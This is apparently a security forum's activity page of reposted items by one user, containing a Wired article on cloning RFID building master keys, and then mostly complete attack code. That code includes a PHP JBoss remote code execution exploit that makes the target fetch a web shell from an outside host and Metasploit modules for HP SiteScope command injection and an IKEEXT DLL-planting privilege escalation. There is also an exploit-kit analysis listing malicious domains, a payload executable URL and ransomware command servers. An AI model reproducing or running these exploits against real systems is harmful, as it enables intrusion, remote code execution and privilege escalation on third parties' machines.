  10. thehat
    Citywide RFID Master House Key? Already Broken By John Borland12.29.132:29 PM HAMBURG – In the bad old days, city apartment buildings often allowed entry to postal or emergency workers with a single master key, which was easily copied or sold on the black market. Many buildings are today switching to RFID-based key cards, citing an advance in security. Yet this claim is certainly suspect. Speaking at the Chaos Communication Congress (CCC) here, security researcher Adrian Dabrowski said a reverse-engineering project had let him open more than 90 percent of the electronically locked apartment doors in his home city of Vienna. The CCC picks locks of all kinds — digital, physical, or Lego. “When the key system was installed in my building, I was like: challenge accepted,” he told conference attendees Sunday. “Customers should not expect any significantly higher security from the new system than with the old system.” The use of RFID cards for master building locks is a particularly sensitive topic, as residents themselves generally lack access to the keys themselves, and are dependent on house managers to create a safe environment. Yet some entry system is needed for services such as garbage pickup, postal delivery and emergency personnel. Many of Vienna’s property developers have thus elected to use locks produced by a company called Begeh Schließsysteme, which as of last year had been installed at more than 9,000 sites across the city. The manufacturer advertises its key card as being uncloneable, and touts features such as the ability to blacklist stolen or revoked cards. Needing a unit to test, Dabrowski managed to persuade a wholesaler to sell him a Begeh lock system by pretending to be from an approved distributor. In tandem, he bought an inexpensive RFID reader, and built a card simulator device himself. With this in place, he needed cards – or at least their output – to test. For this purpose, he bought a mid-range RFID reader able to scan nearby cards, attaching a small external memory and battery to it. He then sent this to himself in a small parcel, which while in transit recorded all nearby RFID signals, including those associated with the postal-service key unlocking his own building’s door. “I thought that if someone opened it or found it, they’d think it was a terrorist or something. So I put a small note in the parcel saying it was an experiment, with my phone number,” he said. “But nobody did.” Armed with that key-card information, he was able to construct a simulation of a master card that worked with his test unit. He found the hardware standards to be similar to a leftover ski-area smart card he had on hand, and reprogrammed this to simulate a Begeh apartment-lock key. This wasn’t a perfect solution – it only opened 43 percent of the 110 apartment doors he subsequently tried. But 93 percent of the Begeh-locked doors tested proved vulnerable to his card emulator device, which he said he had constructed from materials costing less than €20 overall. Conclusion? This master door lock, at least, was no safer than the old mechanical keys. Worse, he said, there was no way to update the new lock systems once the security had been broken. Dabrowski said he had indirectly notified the company responsible for the locks (which accused him of working for a competitor). But he said the most important lesson was that future customers should ask questions before investing in a long-term security device. “Whenever you have a security solution, you are in kind of an arms race with the dark side of the world, so you need some kind of update path,” he said. “People who buy this system should be aware – they should ask about the support lifetime, and about ways to upgrade, because no security system lasts forever.” Sursa: Citywide RFID Master House Key? Already Broken | Threat Level | Wired.com
  11. thehat
    Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE <?php /* Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution google dork: inurl:status EJBInvokerServlet this was used successfully on Windows during a penetration test against McAfee Web Reporter 5.2.1 (tcp port 9111/http) gaining administrative privileges see: http://www.mcafee.com/it/downloads/downloads.aspx file tested: webreporter64bit.zip Usage: C:\PHP>php 9sg_ejb.php 192.168.0.1 id HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=2006101 62339)/Tomcat-5.5 Set-Cookie: JSESSIONID=E9EEE1D6AD27D64ED3835C1092C4FC29; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Length: 43 Date: Fri, 04 Oct 2013 07:25:48 GMT Connection: close uid=0(root) gid=0(root) groups=0(root) C:\PHP> ~ rgod ~ */ $host=$argv[1]; $cmd=$argv[2]; //$port=9111; //mcafee $port=80; //small jsp shell //change this if you want, url to the app to be deployed, keep it short $url="http://retrogod.altervista.org/a.war?"; $url_len=pack("n",strlen($url)); function hex_dump($data, $newline="\n") { static $from = ''; static $to = ''; static $width = 16; static $pad = '.'; if ($from==='') { for ($i=0; $i<=0xFF; $i++) { $from .= chr($i); $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad; } } $hex = str_split(bin2hex($data), $width*2); $chars = str_split(strtr($data, $from, $to), $width); $offset = 0; foreach ($hex as $i => $line) { echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline; $offset += $width; } } $frag_i= "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73". // ....sr.) org.jbos "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72". // s.invoca tion.Mar "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f". // shalledI nvocatio "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77". // n...'A>. ....xppw "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76". // .x..G..S .sr..jav "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2". // a.lang.I nteger.. "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75". // .....8.. .I..valu "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e". // exr..jav a.lang.N "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00". // umber... ........ "\x78\x70\x26\x95\xbe\x0a\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62". // xp&...sr .$org.jb "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d". // oss.invo cation.M "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc". // arshalle dValue.. "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x77"; $frag_ii="\x00"; $frag_iii= "\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e". // .....ur. .[Ljava. "\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f". // lang.Obj ect;..X. "\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00". // .s)l...x p....sr. "\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e". // .javax.m anagemen "\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b". // t.Object Name.... "\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73". // .m.....x pt.!jbos "\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65". // s.system :service "\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78\x74\x00". // =MainDep loyerxt. "\x06\x64\x65\x70\x6c\x6f\x79\x75\x71\x00\x7e\x00\x00\x00\x00\x00". // .deployu q.~..... "\x01\x74". $url_len. $url. "\x75\x72\x00". "\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61". // ur..[ Ljava.la "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d". // ng.Strin g;..V... "\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61". // {G...xp. ...t..ja "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67"; $frag_iv= "\x0d\xd3". "\xbe\xc9\x78\x77\x04\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67". // ..xw.... .sr."org "\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f". // .jboss.i nvocatio "\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8". // n.Invoca tionKey. "\xfb\x72\x84\xd7\x93\x85\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64". // .r...... ..I..ord "\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x05\x73\x71\x00\x7e\x00\x05". // inalxp.. ..sq.~.. "\x77\x0d\x00\x00\x00\x05\xac\xed\x00\x05\x70\xfb\x57\xa7\xaa\x78". // w....... ..p.W..x "\x77\x04\x00\x00\x00\x03\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x04". // w.....sq .~...... "\x73\x72\x00\x23\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e". // sr.#org. jboss.in "\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74". // vocation .Invocat "\x69\x6f\x6e\x54\x79\x70\x65\x59\xa7\x3a\x1c\xa5\x2b\x7c\xbf\x02". // ionTypeY .:..+|.. "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00". // ..I..ord inalxp.. "\x00\x01\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x0a\x70\x74\x00\x0f". // ..sq.~.. ....pt.. "\x4a\x4d\x58\x5f\x4f\x42\x4a\x45\x43\x54\x5f\x4e\x41\x4d\x45\x73". // JMX_OBJE CT_NAMEs "\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d". // r..javax .managem "\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03". // ent.Obje ctName.. "\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62". // ...m.... .xpt.!jb "\x6f\x73\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69". // oss.syst em:servi "\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78". // ce=MainD eployerx "\x78"; // x $data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv; //$pk=""POST /invoker/JMXInvokerServlet/ HTTP/1.1\r\n". //the same ... $pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n". "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n". "Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n". "User-Agent: Java/1.6.0_21\r\n". "Host: ".$host.":".$port."\r\n". "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n". "Connection: keep-alive\r\n". "Content-type: application/x-www-form-urlencoded\r\n". "Content-Length: ".strlen($data)."\r\n\r\n". $data; echo hex_dump($pk)."\n"; $fp=fsockopen($host,$port,$e,$err,3); fputs($fp,$pk); $out=fread($fp,8192); fclose($fp); echo hex_dump($out)."\n"; sleep(5); $pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0\r\n". "Host: ".$host.":".$port."\r\n". "Connection: Close\r\n\r\n"; echo hex_dump($pk)."\n"; $fp=fsockopen($host,$port,$e,$err,3); fputs($fp,$pk); $out=""; while (!feof($fp)) { $out.=fread($fp,8192); } fclose($fp); echo $out; ?> Sursa: Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
  12. thehat
    Yes it's another Exploit Kit. Good news (just because it should be less boring) there is more than two jar in that one. Thanks to Eoin Miller for the inputs that allowed me to write this post. Talking about owls, if you never heard of Moloch (link to its presentation at ShmooCon 2013) you should give it a try (link to github) (good pcap indexer...yes...one day, thanks to tools like this, you'll see Pcap here too ) So HiMan is not the real name of this Exploit Kit. It seems to be High Load but as HighLoad is a reputable security conference that stands in Russia we won't use this name. (for the same kind of reasons, we are now talking about what we previoulsy called PopAds as Magnitude). I didn't heard about any public advert for this Exploit Kit, but ping me if there is and you know where What is tricky with this one is that it seems there is whitelisting filter on referer. Wrong referer : bye ! (obviously wrong country, wrong browser, known ip..same way). (don't know why it's not being done directly on landing... all stats related functions in index ? ). Post to index.php contains upper referer To study this should help knowing which pierced armor we must show HiMan to get all the bullets : CVE-2011-3544 : Java2 (cause CVE-2013-2465 crash for older version of jre6) GET http://fifallllolka .info/xuguczel.php 200 OK (text/html) GET http://fifallllolka .info/js/jquery.js 200 OK (application/javascript) POST http://fifallllolka .info/index.php 200 OK (text/html) java2 in HiMan 2013-10-02 We can easily see this in the noise. GET http://fifallllolka .info/xufomav/b.jar 200 OK (application/java-archive) 378b01a6c3969089d0779aeb80185627 GET http://fifallllolka .info/com.class 404 Not Found (text/html) GET http://fifallllolka .info/edu.class 404 Not Found (text/html) GET http://fifallllolka .info/net.class 404 Not Found (text/html) GET http://fifallllolka .info/org.class 404 Not Found (text/html) GET http://fifallllolka .info/com.class 404 Not Found (text/html) GET http://fifallllolka .info/edu.class 404 Not Found (text/html) GET http://fifallllolka .info/net.class 404 Not Found (text/html) GET http://fifallllolka .info/org.class 404 Not Found (text/html) Getting System Properties for Stats Purposes Piece of dwq.class in b.jar - HiMan 2013-10-02 And passing them to payload URLs Piece cdcdc44 class in b.jar - HiMan 2013-10-02 GET http://fifallllolka .info/xufomav/kds.php?ex=rhi&name=BOBOB&country=US&os=Windows+XP&ver=1.6.0_16 200 OK (application/octet-stream) Payload is a zip containing Flimrans Ransomware : -----------Out of topic : Payload----------- Flimrans : 9eb1f89a74e708c27869eadb0b421ca6 (A ransomware that seems to have been first pushed in Flimkit (as dedicated family) in middle of may 2013. This was the same kind of couple as : Kore with Urausy/FakeAV. I will make a post about it really soon. It's starting to be widely spread). C&C : 95.211.239.222 16265 | 95.211.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V. GET /IccpytZxrc79KfIjQojAavSfYfhOBm4= HTTP/1.1 Host: utipiguty.de Cache-Control: no-cache Analysis by Joe Sandbox Cloud -------------------------------------------- CVE-2013-2465 : Java1 GET http://fifallllllolka .info/sacixudy.php 200 OK (text/html) GET http://fifallllllolka .info/js/jquery.js 200 OK (application/javascript) POST http://fifallllllolka .info/index.php 200 OK (text/html) java1() in HiMan 2013-10-02 GET http://fifallllllolka .info/sivajup/a.jar 4c1aabd2f558c453555da5ff7a7559de 200 OK (application/java-archive) Piece of CVE-2013-2465 in a.jar GET http://fifallllllolka .info/sivajup/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+7&ver=1.6.0_45200 OK (application/octet-stream) CVE-2013-2465 with embedded jnlp (to avoid Security Warning): java3 I'll fly over that one. GET http://fifalllolka .info/xalbigki.php 200 OK (text/html) GET http://fifalllolka .info/js/jquery.js 304 Not Modified () (artifact - cached here) POST http://fifalllolka .info/index.php 200 OK (text/html) java3 in HiMan 2013-10-02 GET http://fifalllolka .info/jumyvvu/a.jar 4c1aabd2f558c453555da5ff7a7559de (same as previously) 200 OK (application/java-archive) GET http://fifalllolka .info/jumyvvu/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+XP&ver=1.7.0_11 200 OK (application/octet-stream) CVE-2010-0188 : It's assumption that it's libtiff as there is an Embedded file. Didn't spend enough time on it .Wepawet and VirusTotal were helpless here. GET http://aakrinopidarasti .info/vibqilro.php 200 OK (text/html) GET http://aakrinopidarasti .info/js/jquery.js 200 OK (application/javascript) POST http://aakrinopidarasti .info/index.php 200 OK (text/html) GET http://aakrinopidarasti .info/gadgepu/d.php?h=h11t11t11p11%3A11%2F11%2F11a11a11k11r11i11n11o11p11i11d11a11r11a11s11t11i11.11i11n11f11o11%2F11g11a11d11g11e11p11u11%2F11k11d11s11.11p11h11p11%3F11e11x11%3D11a11d11%2611n11a11m11e11%3D11B11O11B11O11B11%2611c11o11u11n11t11r11y11%3D11U11S11 200 OK (application/pdf) HiMan's PDF in PDFStreamDumper. The object after some light deobfus (mainly replacing "hello prettylame iwnzzz" by %) [Have to stop here for now- will digg in it to findout why 2 payloads call ] GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US 200 OK (application/octet-stream) (same Flimrans) GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US;1 200 OK (application/octet-stream) CVE-2013-2551 : (working here....) Discovered by Vupen and exploited at Pwn2Own 2013 CVE-2013-2551 in HiMan - 2013-10-01 GET http://akrinopidarasti .info/wywetukr.php 200 OK (text/html) GET http://akrinopidarasti .info/js/jquery.js 200 OK (application/javascript) POST http://akrinopidarasti .info/index.php 200 OK (text/html) IE Check Before Fireing (note : on another pass) Cleaning to see a little better (note : it's another pass so pattern do not match this one) GET http://akrinopidarasti .info/qywurro/sh.php?i=h79t79t79p79%3A79%2F79%2F79a79k79r79i79n79o79p79i79d79a79r79a79s79t79i79.79i79n79f79o79%2F79q79y79w79u79r79r79o79%2F79k79d79s79.79p79h79p79%3F79e79x79%3D79a79d79%2679n79a79m79e79%3D79B79O79B79O79B79%2679c79o79u79n79t79r79y79%3D79U79S79 200 OK (text/html) Piece of CVE-2013-2551 GET http://37.200.65.58/222.exe 200 OK (application/octet-stream) 92c2ad1ca04e431100313b9468842c0d Content-Length: 1536 VT TimeStamp What happen once "infected" ? Exploitation Graph : Files : 4 fiddlers and payloads (Owncloud via goo.gl) Sursa: Malware don't need Coffee: HiMan Exploit Kit. Say Hi to one more.
  13. thehat
    HTExploit [bypassing .htaccess restictions] HTExploit (HiperText access Exploit) is an open-source tool written in Python that exploits a weakness in the way that .htaccess files can be configured to protect a web directory with an authentication process. How to use - Unzip the archive tar xzvf nomearchivio.tar.gz -Enter the folder cd name folder - You will find the file 'htexploit' add. Py final - Launch python htexploit.py -u [www.xxx.it] - Find the output folder Download: HTExploit - Bypassing htaccess Restrictions http://www.mkit.com.ar/labs/htexploit/source/htexploit-0.77.tar.gz Sursa: http://trojanforge.com
  14. thehat
    HP SiteScope is a monitoring software focused on monitoring the availability and performance of distributed IT infrastructures includes Servers, Network, Applications, operating systems, Internet services and various IT Enterprise components. HP Software work on Simple Object Access Protocol SOAP HP SiteScope Remote Code Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'HP SiteScope Remote Code Execution', 'Description' => %q{ This module exploits a code execution flaw in HP SiteScope. The vulnerability exists on the opcactivate.vbs script, which is reachable from the APIBSMIntegrationImpl AXIS service, and uses WScript.Shell.run() to execute cmd.exe with user provided data. Note which the opcactivate.vbs component is installed with the (optional) HP Operations Agent component. The module has been tested successfully on HP SiteScope 11.20 (with HP Operations Agent) over Windows 2003 SP2. }, 'Author' => [ 'rgod <rgod[at]autistici.org>', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-2367'], [ 'OSVDB', '95824' ], [ 'BID', '61506' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-205/' ] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Targets' => [ [ 'HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2', {} ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot") }, 'DisclosureDate' => 'Jul 29 2013')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']) ], self.class) end def uri uri = normalize_uri(target_uri.path) uri << '/' if uri[-1,1] != '/' return uri end def check op = rand_text_alpha(8 + rand(10)) key = rand_text_alpha(8 + rand(10)) value = rand_text_alpha(8 + rand(10)) res = send_soap_request(op, key, value) if res and res.code == 200 and res.body =~ /runOMAgentCommandResponse/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Delivering payload...") # The path to the injection is something like: # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens) # Empirically has been tested a 1500 value for :linemax makes it work # reliable execute_cmdstager({:linemax => 1500}) end def get_vbs_string(str) vbs_str = "" str.each_byte { |b| vbs_str << "Chr(#{b})+" } return vbs_str.chomp("+") end # Make the modifications required to the specific encoder # This exploit uses an specific encoder because quotes (") # aren't allowed when injecting commands def execute_cmdstager_begin(opts) var_decoded = @stager_instance.instance_variable_get(:@var_decoded) var_encoded = @stager_instance.instance_variable_get(:@var_encoded) decoded_file = "#{var_decoded}.exe" encoded_file = "#{var_encoded}.b64" @cmd_list.each { |command| # Because the exploit kills cscript processes to speed up and reliability command.gsub!(/cscript \/\/nologo/, "wscript //nologo") command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file)) command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file)) } end def execute_command(cmd, opts={}) # HTML Encode '&' character # taskkill allows to kill the cscript process which is triggering the # different operations performed by the OPACTIVATE command. It speeds # up exploitation and improves reliability (some processes launched can die # due to the fake activation). But this line also will kill other cscript # legit processes which could be running on the target host. Because of it # the exploit has a Manual ranking command = ""127.0.0.1 && " command << cmd.gsub(/&/, "&") command << " && taskkill /F /IM cscript.exe "" res = send_soap_request("OPCACTIVATE", "omHost", command) if res.nil? or res.code != 200 or res.body !~ /runOMAgentCommandResponse/ fail_with(Failure::Unknown, "#{@peer} - Unexpected response, aborting...") end end def send_soap_request(op, key, value) data = "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" " data << "xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:api=\"http://Api.freshtech.COM\">" data << "<soapenv:Header/>" data << "<soapenv:Body>" data << "<api:runOMAgentCommand soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" data << "<in0 xsi:type=\"x-:Map\" xmlns:x-=\"http://xml.apache.org/xml-soap\">" data << "<item xsi:type=\"x-:mapItem\">" data << "<key xsi:type=\"xsd:string\">#{key}</key>" data << "<value xsi:type=\"xsd:string\">#{value}</value>" data << "</item>" data << "</in0>" data << "<in1 xsi:type=\"xsd:string\">#{op}</in1>" data << "</api:runOMAgentCommand>" data << "</soapenv:Body>" data << "</soapenv:Envelope>" res = send_request_cgi({ 'uri' => normalize_uri(uri, 'services', 'APIBSMIntegrationImpl'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, 'headers' => { 'SOAPAction' => '""' } }) return res end end Sursa: HP SiteScope Remote Code Execution
  15. thehat
    IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules' (IKEEXT) service which runs as SYSTEM, and starts automatically in default installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/windows/services' require 'msf/core/post/windows/priv' class Metasploit3 < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Services include Msf::Post::Windows::Accounts def initialize(info={}) super( update_info( info, 'Name' => 'IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL', 'Description' => %q{ This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules' (IKEEXT) service which runs as SYSTEM, and starts automatically in default installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload. }, 'References' => [ ['URL', 'https://www.htbridge.com/advisory/HTB23108'], ['URL', 'https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html'] ], 'DisclosureDate' => "Oct 09 2012", 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell <eat_meatballs@hotmail.co.uk>' ], 'Platform' => [ 'win'], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'SessionTypes' => [ "meterpreter" ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 5, 'ReverseConnectRetries' => 255 }, 'DefaultTarget' => 0 )) register_options([ OptString.new("DIR", [ false, "Specify a directory to plant the DLL.", ""]) ]) @service_name = 'IKEEXT' @load_lib_search_path = [ '%SystemRoot%\\System32', '%SystemRoot%\\System', '%SystemRoot%' ] @non_existant_dirs = [] end def check_service_exists?(service) srv_info = service_info(service) if srv_info.nil? print_warning("Unable to enumerate services.") return false end if srv_info && srv_info['Name'].empty? print_warning("Service #{service} does not exist.") return false else return true end end def check srv_info = service_info(@service_name) if !check_service_exists?(@service_name) return Exploit::CheckCode::Safe end vprint_status(srv_info.to_s) case srv_info['Startup'] when 'Disabled' print_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Manual' print_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Auto' print_good("Service is set to Automatically start...") end if check_search_path return Exploit::CheckCode::Safe end return Exploit::CheckCode::Vulnerable end def check_search_path dll = 'wlbsctrl.dll' @load_lib_search_path.each do |path| dll_path = "#{expand_path(path)}\\#{dll}" if file_exist?(dll_path) print_warning("DLL already exists at #{dll_path}...") return true end end return false end def check_system_path print_status("Checking %PATH% folders for write access...") result = registry_getvaldata('HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment', 'Path') if result.nil? print_error("Unable to retrieve %PATH% from registry.") return end paths = result.split(';') paths.append(@load_lib_search_path).flatten!.uniq! paths.each do |p| path = expand_path(p) if exist?(path) if check_write_access(path) return path end else # User may be able to create the path... print_status("Path #{path} does not exist...") @non_existant_dirs << path end end return nil end def check_write_access(path) perm = check_dir_perms(path, @token) if perm and perm.include?('W') print_good ("Write permissions in #{path} - #{perm}") return true elsif perm vprint_status ("Permissions for #{path} - #{perm}") else vprint_status ("No permissions for #{path}") end return false end def check_dirs print_status("Attempting to create a non-existant PATH dir to use.") @non_existant_dirs.each do |dir| begin client.fs.dir.mkdir(dir) if exist?(dir) register_file_for_cleanup(dir) return dir end rescue Rex::Post::Meterpreter::RequestError => e vprint_status("Unable to create dir: #{dir} - #{e}") end end return nil end def check_session_arch if sysinfo['Architecture'] =~ /x64/i if payload_instance.arch.first == 'x86' fail_with(Exploit::Failure::BadConfig, "Wrong Payload Architecture") end else if payload_instance.arch.first =~ /64/i fail_with(Exploit::Failure::BadConfig, "Wrong Payload Architecture") end end end def exploit check_session_arch begin @token = get_imperstoken rescue Rex::Post::Meterpreter::RequestError vprint_error("Error while using get_imperstoken: #{e}") end fail_with(Exploit::Failure::Unknown, "Unable to retrieve token.") unless @token if is_system? fail_with(Exploit::Failure::Unknown, "Current user is already SYSTEM, aborting.") end print_status("Checking service exists...") if !check_service_exists?(@service_name) fail_with(Exploit::Failure::NoTarget, "The service doesn't exist.") end if is_uac_enabled? print_warning("UAC is enabled, may get false negatives on writable folders.") end if datastore['DIR'].empty? # If DLL already exists in system folders, we dont want to overwrite by accident if check_search_path fail_with(Exploit::Failure::NotVulnerable, "DLL already exists in system folders.") end file_path = check_system_path file_path ||= check_dirs # If no paths are writable check to see if we can create any of the non-existant dirs if file_path.nil? fail_with(Exploit::Failure::NotVulnerable, "Unable to write to any folders in the PATH, aborting...") end else # Use manually selected Dir file_path = datastore['DIR'] end @dll_file_path = "#{file_path}\\wlbsctrl.dll" service_information = service_info(@service_name) if service_information['Startup'] == 'Disabled' print_status("Service is disabled, attempting to enable...") service_change_startup(@service_name, 'auto') service_information = service_info(@service_name) # Still disabled if service_information['Startup'] == 'Disabled' fail_with(Exploit::Failure::NotVulnerable, "Unable to enable service, aborting...") end end # Check architecture dll = generate_payload_dll # # Drop the malicious executable into the path # print_status("Writing #{dll.length.to_s} bytes to #{@dll_file_path}...") begin write_file(@dll_file_path, dll) register_file_for_cleanup(@dll_file_path) rescue Rex::Post::Meterpreter::RequestError => e # Can't write the file, can't go on fail_with(Exploit::Failure::Unknown, e.message) end # # Run the service, let the Windows API do the rest # print_status("Launching service #{@service_name}...") begin status = service_start(@service_name) if status == 1 print_status("Service already running, attempting to restart...") if service_stop(@service_name) == 0 print_status("Service stopped, attempting to start...") if service_start(@service_name) == 0 print_status("Service started...") else fail_with(Exploit::Failure::Unknown, "Unable to start service.") end else fail_with(Exploit::Failure::Unknown, "Unable to stop service") end elsif status == 0 print_status("Service started...") end rescue RuntimeError => e raise e if e.kind_of? Msf::Exploit::Failed if service_information['Startup'] == 'Manual' fail_with(Exploit::Failure::Unknown, "Unable to start service, and it does not auto start, cleaning up...") else if job_id print_status("Unable to start service, handler running waiting for a reboot...") while(true) break if session_created? select(nil,nil,nil,1) end else fail_with(Exploit::Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...") end end end end end Sursa: IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL
×
×
  • Create New...